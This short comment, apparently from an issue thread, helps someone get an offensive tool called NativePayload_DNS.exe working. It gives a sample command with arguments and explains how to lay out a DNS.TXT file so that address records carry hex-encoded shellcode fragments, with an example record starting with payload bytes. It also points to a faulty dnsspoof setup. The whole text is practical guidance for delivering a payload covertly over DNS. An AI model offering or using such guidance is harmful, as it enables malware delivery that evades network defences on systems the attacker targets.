you did this without Arguments ? ;0
you should run this command by arguments like this one probably :
NativePayload_DNS.exe "1.1.1." 34 "172.168.1.147"

this is wrong first of all you need correct DNS.TXT file , start your ipaddress from 1.1.1.0 up to 1.1.1.29 ==> 30 address ;) first address should be start with 1.1.1.0 , ..... 1.1.1.29 , it should be
1.1.1.0 "0xfc0x480x810xe40xf00xff0xff0xff0xe80xcc0x000x000x000x410x51.1.com"
and your dnsspoof has error ? so your dnsserver not worked ;)
